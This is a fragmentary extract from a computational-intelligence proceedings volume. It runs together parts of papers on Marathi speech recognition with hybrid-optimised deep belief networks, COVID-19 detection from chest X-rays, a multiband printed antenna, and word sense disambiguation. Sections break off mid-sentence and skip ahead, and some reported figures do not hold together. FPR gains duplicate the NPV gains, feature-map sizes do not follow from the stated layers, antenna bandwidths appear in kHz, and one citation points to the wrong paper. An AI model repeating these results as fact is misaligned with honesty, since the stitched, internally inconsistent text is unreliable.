1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 665
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_53
666 R. P. Bachate et al.
such as the traditional HMM-GMM approach, deep learning approach, and hybrid
approach. Each method has its own pros and cons in different circumstances.
Languages spoken by most people in the world benefit from the availability of large
speech corpora for building speech recognition systems. On the other hand, languages
that belong to a small geographical region or are spoken by a small group of people
relative to the world's population receive less attention for developing a speech
recognition system. More than 9.5 crore people in India speak the Marathi language
[1]. The Marathi language has a total of 42 dialects, spread mainly across Maharashtra
state and the remaining parts of India. Little research has been done so far on
developing a speech recognition system for the Marathi language.
A deep belief network is a stack of restricted Boltzmann machines (RBMs), with
two layers, a visible layer and a hidden layer, inside each RBM. Unlike deep
neural networks, each layer of RBM learns all the input. The hidden layer of one
layer becomes a visible layer in its next RBM. “An RBM is an undirected energy-
based model with two layers of visible (v) and hidden (h) units, respectively, with
connections only between layers. RBM has two biases—(a) Hidden layer biases that
are used for a forward pass and (b) Visible layer bias that is used for the backward
pass. Each RBM module is trained one at a time in an unsupervised manner and
using contrastive divergence procedure” [2]. RBM is suitable for many applications
such as regression, feature learning, dimensionality reduction, etc. The performance
of DBN depends on the three parameters—(i) number of hidden units, (ii) number of
layers, (iii) number of iterations [3]. The performance of DBN flattens after reach-
ing the threshold number of hidden units. If the number of hidden layers increases,
the performance of DBN is affected badly. But the performance of DBN can be
increased by increasing the training iterations of RBM. The total energy of RBM
with the hidden layer (h) and visible layer (v) is denoted in Eq. (1)
$$E(v, h) = -\sum_{a} \alpha_a v_a - \sum_{b} \beta_b h_b - \sum_{a,b} v_a B_{a,b} h_b \qquad (1)$$

where $\alpha_a$ and $\beta_b$ are the visible- and hidden-unit biases and $B_{a,b}$ is the weight between visible unit $a$ and hidden unit $b$.
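As a quick illustration, the standard RBM energy can be evaluated directly from the biases and weights; a minimal NumPy sketch (all values are illustrative):

```python
import numpy as np

def rbm_energy(v, h, W, a, b):
    """Standard RBM energy: E(v, h) = -a.v - b.h - v.W.h"""
    return -np.dot(a, v) - np.dot(b, h) - v @ W @ h

# Tiny example: 3 visible units, 2 hidden units
v = np.array([1.0, 0.0, 1.0])  # visible configuration
h = np.array([0.0, 1.0])       # hidden configuration
W = np.zeros((3, 2))           # visible-hidden weights B_{a,b}
a = np.array([0.1, 0.2, 0.3])  # visible biases
b = np.array([0.4, 0.5])       # hidden biases

# With zero weights the energy is just minus the active-unit biases
print(rbm_energy(v, h, W, a, b))  # approximately -0.9
```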
The rest of this paper is organized as follows: related work on existing speech recognition methodologies is presented in Sect. 2. The duo features with hybrid-meta-heuristic-based deep belief network are discussed in Sect. 3. The experimental setup, results, and performance analysis of various pattern recognition algorithms are specified in Sect. 4. Finally, the conclusion and future scope of the paper are given in Sect. 5.
2 Related Work
"make their life better using NLP, we need to work on regional languages like Marathi, Hindi, Punjabi, and so on" [4]. Supriya et al. [5] implemented a Marathi automatic speech recognition system using HMM and DNN. The dataset used for this implementation contains 15,000 speech files from 1500 different speakers. The proposed system was implemented using the Kaldi ASR toolkit and achieved a 24% word error rate. A text corpus of 340 sentences was also used. Five models (Mono, Tri1, Tri2, Tri3, and SGMM) were used in the system for comparative study, and SGMM gives a better result compared to the other models. Kishori et al. [6] proposed a Marathi ASR system for isolated words using a neural network. The speech corpus used for the implementation consists of 100 words from 100 different speakers with three utterances of each word. The discrete wavelet transform (DWT) algorithm was used for feature extraction. For pattern recognition, an artificial neural network (ANN) was used, which gave 60% accuracy. Lokesh et al. [7] built a Tamil automatic speech recognition system with a bi-directional recurrent neural network. The SGF algorithm was used for speech data pre-processing, feature extraction was implemented using the MAR and PLP algorithms, and a BRNN was used as the classifier. Different classification algorithms such as BRNN-SOM, RNN, and DNN-HMM were implemented and analyzed for performance measurement. The proposed system achieved 93.6% accuracy, which is better than the other classifiers. Sangramsing [8] implemented Marathi speech recognition using the HTK toolkit. Here, MFCC is used for feature extraction and HMM for classification. With this, a 5.37% word error rate and 94.63% accuracy were achieved. The dataset used for the implementation is minimal, i.e., 30 words and eight different speakers. Puneet et al. [9] developed a Punjabi ASR system for mobile phones. The MFCC algorithm is used for feature extraction, and GMM is used as the pattern recognition technique. A 6.34 h speech corpus with 48 distinct speakers was used; this corpus contains 1275 words. The system gives the highest accuracy for a higher number of GMM components, i.e., 64, and the GMM-CD Untied model gave the highest accuracy of 81.2%. Ravindra and Ashok [10] discussed various approaches used for pattern recognition, comparing the performance of different classifiers for building a speech recognition system, such as KNN, SVM, NN, DNN, and DBN. After implementing and analyzing the results of these algorithms, it was found that DBN gives better results compared to the other classifier algorithms.
The Grey Wolf Optimizer (GWO) algorithm was proposed by Mirjalili et al. in 2014 [11]. The design of this algorithm is based on a natural scenario, i.e., survival of the fittest: organisms in nature evolve through heredity, selection, and mutation, and the searching process of the wolves changes accordingly. There are four phases of wolf hunting: (i) searching for prey, (ii) encircling prey, (iii) hunting, and (iv) attacking the target [12]. "After each iteration of the algorithm, sort the fitness value that corresponds to each wolf in ascending order, and then eliminate the R wolves with the worst fitness values; meanwhile, randomly generate wolves equal to the number of eliminated wolves".
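The elimination step in the quotation above can be sketched as follows (a minimal sketch assuming a minimisation problem; the function names and the toy sphere objective are illustrative):

```python
import random

def cull_and_regenerate(wolves, fitness_fn, R, dim, lo, hi):
    """Sort wolves by fitness (ascending, for minimisation), drop the R worst,
    and replace them with randomly generated wolves."""
    wolves.sort(key=fitness_fn)             # best (lowest fitness) first
    survivors = wolves[:-R] if R else wolves
    newcomers = [[random.uniform(lo, hi) for _ in range(dim)] for _ in range(R)]
    return survivors + newcomers

# Toy usage: minimise the sphere function in 2-D
sphere = lambda w: sum(x * x for x in w)
pack = [[random.uniform(-5, 5), random.uniform(-5, 5)] for _ in range(10)]
pack = cull_and_regenerate(pack, sphere, R=3, dim=2, lo=-5, hi=5)
print(len(pack))  # population size is preserved: 10
```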
The inspiration for the Whale Optimization Algorithm (WOA) comes from whales, the largest mammals in the world. Of the whale's seven different species, the humpback is considered here in designing the algorithm. The unique bubble-net feeding behavior, observed only in humpback whales, is used to develop the algorithm [12]. This algorithm involves three phases: (i) encircling prey, (ii) bubble-net attacking, and (iii) searching for prey. "WOA is a simple, robust, and swarm-based stochastic optimization algorithm. Population-based WOA can avoid local optima and get a globally optimal solution" [13].
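The bubble-net (spiral) attacking phase updates a whale's position along a logarithmic spiral around the best solution found so far, following the spiral update rule of WOA [12]; a minimal sketch (names are illustrative):

```python
import math
import random

def spiral_update(x, best, b=1.0):
    """WOA bubble-net (spiral) position update:
    X(t+1) = D' * e^(b*l) * cos(2*pi*l) + X*, with D' = |X* - X|
    and l drawn uniformly from [-1, 1]."""
    l = random.uniform(-1.0, 1.0)
    return [abs(bi - xi) * math.exp(b * l) * math.cos(2 * math.pi * l) + bi
            for xi, bi in zip(x, best)]

whale = [3.0, -2.0]
best_so_far = [0.0, 0.0]
print(spiral_update(whale, best_so_far))  # a new position spiralling toward the best
```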
The Rider Optimization Algorithm (ROA) is inspired by a group of riders who want to reach a target location and become the winner [15]. There are four types of riders: (i) bypass rider, (ii) follower, (iii) overtaker, and (iv) attacker. Each rider has its own nature and strategy for reaching the destination. The bypass rider skips the leading path; in simple words, it does not follow the leading rider and chooses its own path. The follower group of riders follows the leading rider. The overtaker rider adjusts its path with respect to the leading rider to reach the destination. The attacker rider uses maximum speed to reach the target location. The ROA algorithm is used here for obtaining the optimal weights in the neural network.
The proposed duo features with hybrid-meta-heuristic-based deep belief network is divided into three parts: speech corpus pre-processing implemented with a smoothing technique; feature extraction using duo features, a newly proposed feature extraction methodology; and classification implemented with the newly proposed hybrid algorithm RCBO-DBN. The proposed model is shown in Fig. 1.
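The paper does not specify which smoothing technique is applied during pre-processing; as one hypothetical example, a simple moving-average smoother over the raw signal could look like this:

```python
def moving_average_smooth(signal, window=3):
    """Simple moving-average smoothing (one possible smoothing technique;
    the paper does not state which smoothing method it actually uses)."""
    half = window // 2
    out = []
    for i in range(len(signal)):
        lo, hi = max(0, i - half), min(len(signal), i + half + 1)
        out.append(sum(signal[lo:hi]) / (hi - lo))  # average over the window
    return out

print(moving_average_smooth([0.0, 3.0, 0.0, 3.0, 0.0]))  # [1.5, 1.0, 2.0, 1.0, 1.5]
```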
The feature extraction phase plays a vital role in the speech recognition system, because the performance of the classifier depends on the accuracy and qual-
The results of the various optimized DBNs and the proposed RCBO are given in Table 2. The first positive measure used for analysis is accuracy. The proposed algorithm gives an accuracy of 71.5%, which is 2.11% higher than GWO-DBN, 8.84% higher than WOA-DBN, 8.46% higher than CBBO-DBN, and 9.82% higher than ROA-DBN. The precision of the proposed optimized DBN gives an improvement of 0.22% over GWO-DBN, 1.22% over WOA-DBN, 1.1% over CBBO-DBN, and 1.28% over ROA-DBN. The Negative Predictive Value is another positive measure used for performance analysis. The RCBO-DBN performs well compared to the conventional optimized algorithms, giving an improvement of 0.41% over GWO-DBN, 7.27% over WOA-DBN, 6.91% over CBBO-DBN, and 8.29% over ROA-DBN. The first negative measure considered here is the FPR, whose values are mentioned in Table 2; it gives a betterment of around 0.41% over GWO-DBN, 7.27% over WOA-DBN, 6.91% over CBBO-DBN, and 8.29% over ROA-DBN. Another negative measure used here for performance analysis is the FNR. The FNR results of the proposed feature extraction technique are given in Table 2 and are good with respect to the other conventional optimized algorithms; the proposed technique provides an improvement of 2.43% over GWO-DBN, 2.02% over WOA-DBN, 0.54% over CBBO-DBN, and 0.81% over ROA-DBN. The last negative measure used here for performance analysis is the FDR. The proposed approach provides an improvement of 0.97% over GWO-DBN, 2.36% over WOA-DBN, 0.54% over CBBO-DBN, and 1.69% over ROA-DBN.
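For reference, the positive and negative measures discussed above are standard confusion-matrix statistics; a sketch with illustrative counts (not the paper's actual data):

```python
def classification_measures(tp, fp, tn, fn):
    """Positive and negative measures of the kind reported in Table 2,
    computed from confusion-matrix counts."""
    return {
        "accuracy":  (tp + tn) / (tp + fp + tn + fn),
        "precision": tp / (tp + fp),
        "npv":       tn / (tn + fn),   # Negative Predictive Value
        "fpr":       fp / (fp + tn),   # False Positive Rate
        "fnr":       fn / (fn + tp),   # False Negative Rate
        "fdr":       fp / (fp + tp),   # False Discovery Rate
    }

# Illustrative counts only
m = classification_measures(tp=80, fp=20, tn=60, fn=40)
print(m["accuracy"], m["precision"], m["fdr"])  # 0.7 0.8 0.2
```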
5 Conclusion
This paper has proposed a novel feature extraction and pattern recognition approach for a Marathi speech recognition system. For experimentation, related work in the speech domain for Marathi as well as other Indic and non-Indic languages was studied. Here, the optimal features were selected using the proposed duo-feature extraction technique. After performance analysis, it was observed that the duo features perform better, with an advantage of 12.7% over MFCC and 13% over spectral features. Pattern recognition was achieved with the proposed RCBO-DBN and other conventional optimized DBN techniques. The proposed optimization technique gives an advantage of 2.11% over GWO-DBN, 8.84% over WOA-DBN, 8.46% over CBBO-DBN, and 9.82% over ROA-DBN. Future work focuses on implementing RNN and LSTM and comparing the results with the proposed RCBO-DBN.
References
1. Eberhard, D. M., Simons, G. F., & Fennig, C. D. Ethnologue: Languages of the World. SIL International. [Online]. Available: https://www.ethnologue.com/language/mar.
2. Morabito, F. C., Campolo, M., Ieracitano, C., & Mammone, N. (2018). Deep learning
approaches to electrophysiological multivariate time-series analysis. Elsevier Inc.
Duo Features with Hybrid-Meta-Heuristic-Deep Belief … 673
3. Salama, M. A., Hassanien, A. E., & Fahmy, A. A. (2011). Deep belief network for clustering and
classification of a continuous data. In 10th IEEE International Symposium on Signal Processing
and Information Technology, p. 24.
4. Bachate, R. P. & Sharma, A. (2020). Acquaintance with natural language processing for building
smart society. In E3S Web Conference, 170, 02006.
5. Paulose, S., Nath, S., & Samudravijaya, K. (2018). Marathi speech recognition. In The 6th International Workshop on Spoken Language Technologies for Under-Resourced Languages, 29–31 August 2018 (pp. 235–238). Gurugram, India.
6. Ghule, K. R., & Deshmukh, R. R. (2015). Automatic speech recognition of marathi isolated
words using neural network, 6(5), 4296–4298.
7. Lokesh, S., Malarvizhi Kumar, P., Ramya Devi, M., Parthasarathy, P., & Gokulnath, C. (2019).
An automatic tamil speech recognition system by using bidirectional recurrent neural network
with self-organizing map. Neural Computing and Applications, 31(5), 1521–1531.
8. Sangramsing, K. (2015, December). Marathi speech recognition system using hidden markov
model toolkit. Concurrent Engineering Research and Applications, 5(12).
9. Mittal, P., & Singh, N. (2019). Development and analysis of Punjabi ASR system for mobile
phones under different acoustic models. International Journal of Speech Technology, 22(1),
219–230.
10. Bachate, R. P., & Sharma, A. (2020). Comparing different pattern recognition approaches of
building Marathi ASR system. International Journal of Advanced Science and Technology,
29(5), 4615–4623.
11. Pradhan, M., Roy, P. K., & Pal, T. (2018). Oppositional based grey wolf optimization algorithm
for economic dispatch problem of power system. Ain Shams Engineering Journal, 9(4), 2015–
2025.
12. Mirjalili, S., & Lewis, A. (2016). The whale optimization algorithm. Advances in Engineering
Software, 95, 51–67.
13. Nasiri, J., & Khiyabani, F. M. (2018). A whale optimization algorithm (WOA) approach for
clustering. Cogent Mathematics and Statistics, 5(1), 1–13.
14. Saremi, S., Mirjalili, S., & Lewis, A. (2014). Biogeography-based optimization with chaos.
Neural Computing and Applications, 25(5), 1077–1097.
15. Binu, D., & Kariyappa, B. S. (2019). RideNN: A new rider optimization algorithm-based
neural network for fault diagnosis in analog circuits. IEEE Transactions on Instrumentation
and Measurement, 68(1), 2–26.
Computer-Aided Diagnostic
of COVID-19 Using Chest X-Ray
Analysis
1 Introduction
The COVID-19 infectious disease, which has spread to more than 210 countries and claimed many lives, has become a pandemic. The COVID-19 pandemic has taken a massive toll on people all over the globe. The risk of pneumonia for patients with COVID-19 is immense, especially in age groups above sixty and in people suffering from other diseases. Coronaviruses are important pathogens of humans and animals. At present, the novel COVID-19 is growing at an alarming rate all over the world and poses a threat to the survival of billions of humans. While chest CT is said to be a successful imaging procedure for the assessment of lung-related illness, chest
676 M. Shetty and S. Shetty
X-ray is more commonly used due to its shorter imaging time and significantly lower cost than CT. Deep learning, one of the most common AI methods, is an excellent means of building tools and algorithms to improve human life. Detection of disorders through X-ray images is a problem that needs a better solution. In fact, the number of CXRs to be investigated is vast, and well beyond the capacity of medical staff, particularly in developing countries. A computer-aided diagnostic (CAD) program will mark prospective areas on a CXR for doctors to closely inspect and will alert them in situations where immediate treatment is required. One of the main tasks in developing CAD functionality is to detect and identify disease from CXRs automatically, helping radiologists to examine the massive quantities of X-ray images, which is crucial for successful and accurate COVID-19 examination. The key aim of the proposed experiment is to increase the efficiency and performance of radiologists by developing a computational framework for the identification and classification of COVID-19 disease. Our studies were centered on a collection of chest X-ray images named metadata.csv collected at the University of Montreal by Dr Joseph Cohen, a postdoctoral fellow [1]. Experimental findings indicate that the system built here can detect COVID-19 cases with 98.00% accuracy.
2 Survey of Literature
3 Proposed System
validation, the original data organization was changed: we reorganized all of the data into training and validation collections. The training set was assigned 80% of the images, and the test set was given 20% of the images to boost evaluation accuracy. We used several data augmentation methods to artificially increase the dataset size; this helps solve overfitting issues and increases the ability of the system to generalize during training. The framework given in Fig. 3 is composed of combined classification, convolution, and max-pooling layers. The feature extractors include conv 3 × 3, 32; conv 3 × 3, 64; conv 3 × 3, 128; conv 3 × 3, 128; max-pooling layers of size 2 × 2; and a ReLU activation between them. The outputs of the convolution and max-pooling operations are organized into 2D planes called feature maps. With an input image of size 224 × 224 × 3, we obtained feature maps of sizes 208 × 208 × 32, 102 × 102 × 64, 49 × 49 × 128, and 22 × 22 × 128 from the convolution operations, and of sizes 104 × 104 × 32, 51 × 51 × 64, 24 × 24 × 128, and 11 × 11 × 128 from the pooling operations, respectively. It is worth noting that every plane of a level in the network was
achieved by combining one or several planes of the previous level. The classifier is located toward the far end of the proposed convolutional neural network (CNN). It is essentially an artificial neural network (ANN) and is also called a dense layer. This classifier uses feature vectors, like any other classifier, to conduct classification. So, the features extracted by the CNN part are transformed into a one-dimensional feature vector for the classifier. This process is termed flattening, in which the result obtained from the convolution layers is flattened to produce one long feature vector for use in the final classification by the dense layers. The main components of the classification layer are a dropout of size 0.5, two dense layers, a flatten layer, a ReLU between the two dense layers, and a sigmoid that performs the final classification.
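The flattening step described above can be illustrated with the final 11 × 11 × 128 pooled feature maps reported in the text; a small NumPy sketch:

```python
import numpy as np

# Final pooled feature maps reported in the text: 11 x 11 x 128.
# Flattening turns them into one long feature vector for the dense layers.
feature_maps = np.zeros((11, 11, 128))
flat = feature_maps.reshape(-1)
print(flat.shape)  # (15488,): 11 * 11 * 128 features fed to the classifier
```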
pattern testing for radiological evidence from COVID-19-positive people and non-COVID-19 people in various places around the globe. For every patient, the dataset includes details such as age, location, and physicians' remarks. The classification results were therefore analyzed against this dataset information and are in good agreement with it. We obtained 99.00% sensitivity and 80.00% specificity. These results imply that COVID-19 is identified accurately, but the accuracy for non-COVID-19 cases is 80.00%, as given in Table 1; the graph shows training and validation accuracy and loss. Since the true negative rate is not satisfactory, we will address this in future research with a larger dataset.
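Sensitivity and specificity are computed from confusion-matrix counts; the sketch below uses hypothetical counts chosen only to reproduce the reported percentages, not the paper's actual confusion matrix:

```python
def sensitivity_specificity(tp, fn, tn, fp):
    """Sensitivity (true positive rate) = TP / (TP + FN);
    Specificity (true negative rate) = TN / (TN + FP)."""
    return tp / (tp + fn), tn / (tn + fp)

# Hypothetical counts reproducing the reported 99% sensitivity, 80% specificity
sens, spec = sensitivity_specificity(tp=99, fn=1, tn=80, fp=20)
print(sens, spec)  # 0.99 0.8
```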
5 Conclusion
We have shown how a series of chest X-ray images can be used to recognize positive COVID-19 cases. We performed this experiment from scratch, which distinguishes it from processes that depend strongly on transfer learning. This research is to be expanded in future to identify and classify COVID-19 images present in large X-ray image datasets. Differentiating X-ray pictures that show COVID-19-related pneumonia from non-COVID-19 pneumonia remains a big issue; our next approach will tackle this problem.
References
1. Cohen, J. P., Morrison, P., Dao, L., Roth, K., Duong, T. Q., & Ghassemi, M. (2020). COVID-19 image data collection: Prospective predictions are the future. arXiv preprint arXiv:2006.11988.
2. Brunetti, A., Carnimeo, L., Trotta, G. F., & Bevilacqua, V. (2019). Computer-assisted frame-
works for classification of liver, breast and blood neoplasias via neural networks: A survey
based on medical images. Neurocomputing, 335, 274–298.
3. Litjens, G., Kooi, T., Bejnordi, B. E., Setio, A. A. A., Ciompi, F., Ghafoorian, M., Van Der
Laak, J. A., Van Ginneken, B., & Sánchez, C. I. (2017). A survey on deep learning in medical
image analysis. Medical Image Analysis, 42, 60–88.
4. Asiri, N., Hussain, M., Al Adel, F., & Alzaidi, N. (2019). Deep learning based computer-aided
diagnosis systems for diabetic retinopathy-a survey. Artificial Intelligence in Medicine.
5. Zhou, T., Thung, K.-H., Zhu, X., & Shen, D. (2019). Effective feature learning and fusion
of multimodality data using stage-wise deep neural network for dementia diagnosis. Human
Brain Mapping, 40(3), 1001–1016. https://doi.org/10.1002/hbm.24428
6. Shickel, B., Tighe, P. J., Bihorac, A., & Rashidi, P. (2017). Deep EHR: a survey of recent
advances in deep learning techniques for electronic health record (EHR) analysis. IEEE Journal
of Biomedical and Health Informatics, 22(5), 1589–1604. https://doi.org/10.1109/JBHI.2017.
2767063 arXiv:1706.03446.
7. Jacobi, A., Chung, M., Bernheim, A., & Eber, C. (2020). Portable chest x-ray in coronavirus
disease-19 (covid-19): A pictorial review. Clinical Imaging.
8. Wang, S., & Summers, R. M. (2012). Machine learning and radiology. Medical Image Analysis,
16(5), 933–951.
9. Ker, J., Wang, L., Rao, J., & Lim, T. (2017). Deep learning applications in medical image
analysis. IEEE Access, 6, 9375–9389.
10. Mittal, A., Hooda, R., & Sofat, S. (2017). Lung field segmentation in chest radiographs: A
historical review, current status, and expectations from deep learning. IET Image Processing,
11, 937–952. https://doi.org/10.1049/iet-ipr.2016.0526
11. Bar, Y., Diamant, I., Wolf, L., Lieberman, S., Konen, E., & Greenspan, H. (2018). Chest
pathology identification using deep feature selection with non-medical training. Computer
Methods in Biomechanics and Biomedical Engineering: Imaging & Visualization, 6(3), 259–
263.
Low Cost Compact Multiband Printed
Antenna for Wireless Communication
Systems
Abstract The proposed approach aims to design a compact multiband printed antenna for wireless communication applications. The basic aim of the antenna design is to achieve wide bandwidth, low weight, and reduced size, which lowers cost as well. The structure includes a main radiator, two sub-patches, and the ground plane, which generates bands at multiple frequencies of 1.25, 1.75, 2.45, 3.95, and 5.1 GHz with bandwidths of 45, 68, 112, 127, and 240 kHz, respectively. A defected ground structure (DGS) has been used to improve the parameters of the proposed antenna. The simulated and fabricated results exhibit a good reflection coefficient, radiation pattern, and stable gain, so this antenna is applicable for the DCS/Bluetooth/WLAN/WiMAX/IMT bands. The proposed antenna is designed and analyzed using the Ansys HFSS 11.2 high-frequency structure simulation tool. The simulated antenna was fabricated using a photolithographic method, and a vector network analyzer was used to measure the fabricated results. The proposed antenna shows good agreement between both sets of results. The proposed antenna works at multiple frequencies in bands from 1.25 to 5.1 GHz, covering the Bluetooth system, 2.12–2.45 GHz for the WLAN systems, 3.45–3.95 GHz for the WiMAX system, and 4.95–5.1 GHz for the IMT system.
684 R. Prabha et al.
1 Introduction
Patch antennas are used for narrow-bandwidth operation and can be used in the advancement of wireless applications. These antennas are low profile, inexpensive, and easy to manufacture using advanced printed circuit technology. They are adaptable with regard to impedance, resonant frequency, and polarization when one specific mode is chosen [1]. In [2, 3], a dipole antenna is used to design antennas for different frequency bands. Slots of different shapes have been used in mobile communications [4, 5], and various Quasi-Yagi antennas have been used in wireless communications because of their broadband characteristics, good radiation performance, and acceptable absolute gain (0–4.4 dBi) [6]. Different methods have been proposed to serve wireless communication applications using U and L slots [5, 7]. Omnidirectional radiation patterns and sustainable antenna gain have been achieved over the operating bands [8, 9], and other methods have been proposed for wide bandwidth [10]. The defected ground structure (DGS) method has proved to be very easy and usable for achieving additional resonances and bandwidth enhancement while removing unwanted frequencies [11, 12]. Another practical approach has been employed to elevate the transmission capacity of the antenna: a thicker substrate may be used as a substitute, but it results in more energy being confined in the substrate [13]. Thus, different methods have been used to achieve a multiband antenna for particular resonant frequencies.
This paper presents a multiband antenna that generates different frequency bands, namely DCS (1710–1880 MHz), IEEE 802.11b/g WLAN (2.45–2.54 GHz), WiMAX (3.25–3.95 GHz), and IEEE 802.11a WLAN and IMT (5.1–5.95 GHz), with a simple design of dual patches, L slots, and changes in the ground structure used to generate the multiband and compactness characteristics. The defected ground structure and a circular slot are used to improve the proposed frequencies, radiation pattern, and return loss of the presented antenna. The simulation process and fabricated results show that the designed antenna performs adequately and fits wireless communications systems. The configuration and simulation data are discussed in Sects. 2 and 3, where the antenna parameters are carefully examined; Sect. 4 compares the fabricated data and simulated results, which satisfy the operational DCS/Bluetooth/WLAN/WiMAX/IMT bands. Further study includes making the antenna reconfigurable using a varactor diode, so that this single antenna will be applicable for various applications without major alterations. The gain, bandwidth, and other parameters are enhanced using the defected ground structure (DGS), which also quells surface wave propagation. These antennas can work over a compact, broad frequency range.
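For context, the size of a simple rectangular patch for a given band can be estimated from the standard transmission-line-model design equations; this is a generic textbook sketch, not the authors' actual design procedure, and the 2.45 GHz / 1.6 mm FR-4 values are hypothetical:

```python
import math

C = 3e8  # speed of light (m/s)

def patch_dimensions(f_r, eps_r, h):
    """Rectangular microstrip patch width W and length L from the
    transmission-line model. f_r in Hz, permittivity eps_r, height h in m."""
    W = C / (2 * f_r) * math.sqrt(2 / (eps_r + 1))
    # Effective permittivity accounting for fringing fields
    eps_eff = (eps_r + 1) / 2 + (eps_r - 1) / 2 * (1 + 12 * h / W) ** -0.5
    # Length extension due to fringing
    dL = 0.412 * h * ((eps_eff + 0.3) * (W / h + 0.264)) / \
         ((eps_eff - 0.258) * (W / h + 0.8))
    L = C / (2 * f_r * math.sqrt(eps_eff)) - 2 * dL
    return W, L

# Hypothetical values: 2.45 GHz on 1.6 mm FR-4 (eps_r ~ 4.4)
W, L = patch_dimensions(2.45e9, 4.4, 1.6e-3)
print(round(W * 1000, 1), round(L * 1000, 1))  # patch width and length in mm
```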
Low Cost Compact Multiband Printed Antenna … 685
The structure of the simulated antenna, which has two patch elements and works at the 1.25, 1.75, 2.45, 3.39, and 5.1 GHz frequency bands, is presented in Fig. 1a, b. The design influences the current distribution and may also affect the propagation and stimulation of electromagnetic waves through the substrate layer [12].
Fig. 2b Radiation patterns of the simulated antenna at various frequencies: (a) 1.25 GHz, (b) 1.73 GHz, (c) 2.45 GHz, (d) 3.9 GHz, (e) 5.1 GHz [2]
Fig. 2c Simulated gain of the antenna at various frequencies: (a) 1.25 GHz, (b) 1.73 GHz, (c) 2.45 GHz, (d) 3.9 GHz, (e) 5.1 GHz [2]
is between 2 and 4 dB for the multiple bands, as shown in Fig. 2b. The loss induced in the FR-4 material is due to variation at the higher resonating frequencies.
Simulated Gain
The antenna gain is one of the important parameters for examining the ability of an antenna to radiate more or less in a given direction. In this design, the improvement in antenna gain results from the defected ground structure and the various slots in the antenna. The proposed antenna provides a gain of −5.27 dB at 1.25 GHz, 2.60 dB at 1.75 GHz, 1.31 dB at 2.5 GHz, 0.377 dB at 3.95 GHz, and −0.1419 dB at 5.1 GHz. The second important parameter of an antenna is its efficiency, which shows how efficiently the antenna works (Fig. 2c).
The presented antenna has different slots and a DGS covering the DCS, Bluetooth, WLAN, WiMAX, and IMT bands. The top and bottom views of the designed antenna are presented in Fig. 3. L and I slots are etched on the fabricated antenna, and the bottom view of the fabricated antenna contains the H-shaped DGS, as shown in the figure below. The fabricated structure is a very exact realization of the simulated design of the proposed antenna. This fabricated multiband antenna is very useful for wireless communication systems. The antenna was also tested using a VNA and measured over the frequency range of 1–6 GHz. Table 4 shows the simulated and fabricated results, comparing their basic parameters.
5 Conclusion
This paper presented the design of a compact wideband and multiband antenna for wireless communication systems such as the DCS, Bluetooth, WLAN, WiMAX, and IMT bands. The multiband frequencies can be individually controlled using the L slots, I slots, and defected ground structure without influencing the wideband performance. The results of the proposed antenna show good performance with regard to return loss, radiation pattern, gain, and efficiency. The primary features of the presented multiband antenna include low profile, light weight, and ease of fabrication, with future smaller wireless communication systems in mind. The antenna design procedure has been presented in detail. The inclusion of a varactor or tunnel diode in the design would make it reconfigurable, enabling the five bands to be independently tuned and electrically connected over the broad frequency range. The proposed design has been fabricated and measured, and the measured and simulated results show good agreement with each other.
References
1. Liu, W.-C., Wu, C.-M., & Dai, Y. (2011). Design of triple-frequency microstrip-fed monopole
antenna using defected ground structure. IEEE Transactions on Antennas and Propagation,
59(7).
2. Prabha, R., Tripathi, G. S., & Verma, S. (2016). Design of compact wideband and multi-
band antenna for wireless communication systems. In International conference on advances
in computing, control and communication technology in University of Allahabad, pp 79–85.
3. Abutarboush, H. F., Nilavalan, R., Cheung, S. W., et al. (2012). A reconfigurable wideband and
multiband antenna using dual-patch elements for compact wireless devices. IEEE Transactions
on Antennas and Propagation, 60(1).
4. Lee, Y.-C., & Sun, J.-S. (2009). A new printed antenna for multiband wireless applications.
IEEE Antennas and Wireless Propagation Letters, 8.
5. Huang, C.-Y., & Yu, E.-Z. (2011). A slot-monopole antenna for dual-band WLAN applications.
IEEE Antennas and Wireless Propagation Letters, 10.
6. Wu, Z., Li, L., Chen, X., & Li, K. Dual-band antenna integrating with rectangular mushroom-
like superstrate for WLAN applications. IEEE Antennas and Wireless Propagation Letters.
https://doi.org/10.1109/LAWP.2015.2504558.
7. Yu, Y.-C., & Tarng, J.-H. (2009). A novel modified multiband planar inverted-F antenna. IEEE
Antennas and Wireless Propagation Letters, 8.
8. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U-shaped slots for WLAN/WiMAX applications. IEEE Antennas Wireless
Propagation Letters, 13, 388–391.
9. Chen, H., Yang, X., Yin, Y. Z., Fan, S. T., & Wu, J. J. (2013). Triband planar monopole antenna
with compact radiator for WLAN/WiMAX applications. IEEE Antennas Wireless Propagation
Letters, 12, 1440–1443.
10. Li, B., Hong, J., & Wang, B. (2012). Switched band-notched UWB/dual-band WLAN slot
antenna with inverted S-shaped slots. IEEE Antennas and Wireless Propagation Letters, 11.
11. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U shaped slots for WLAN/WiMAX applications. IEEE Antennas and
Wireless Propagation Letters, 13.
12. Colburn, J. S., & Rahmat-Samii, Y. (1999). Patch antennas on externally perforated high
dielectric constant substrates. IEEE Transactions on Antennas and Propagation, 47(12).
13. Kumar, C., & Guha, D. (2012). Nature of cross-polarized radiations from probe-fed circular
microstrip antennas and their suppression using different geometries of defected ground
structure (DGS). IEEE Transactions on Antennas and Propagation, 60(1).
14. Abutarboush, H. F., Nilavalan, R., & Nasr, K. M. (2012). Compact printed multiband antenna
with independent setting suitable for fixed and reconfigurable wireless communication systems.
IEEE Transactions on Antennas and Propagation, 60(8).
A Detailed Analysis of Word Sense
Disambiguation Algorithms
and Approaches for Indian Languages
1 Introduction
Worldwide, in all major languages, there are countless words that have different meanings in different contexts. These words are referred to as "ambiguous words," and the existence of such words is referred to as "ambiguity." Almost all natural languages continue to suffer from different kinds of ambiguities, and the English language is no exception. To translate from English into other languages, and from other languages into English, these ambiguous words must be disambiguated correctly for a relevant translation into the target language. Disambiguation of senses is the process that resolves the problem of ambiguity. Therefore,
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 693
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_56
694 A. S. Maurya and P. Bahadur
WSD is the process of selecting the exact sense of an ambiguous word in its given context.
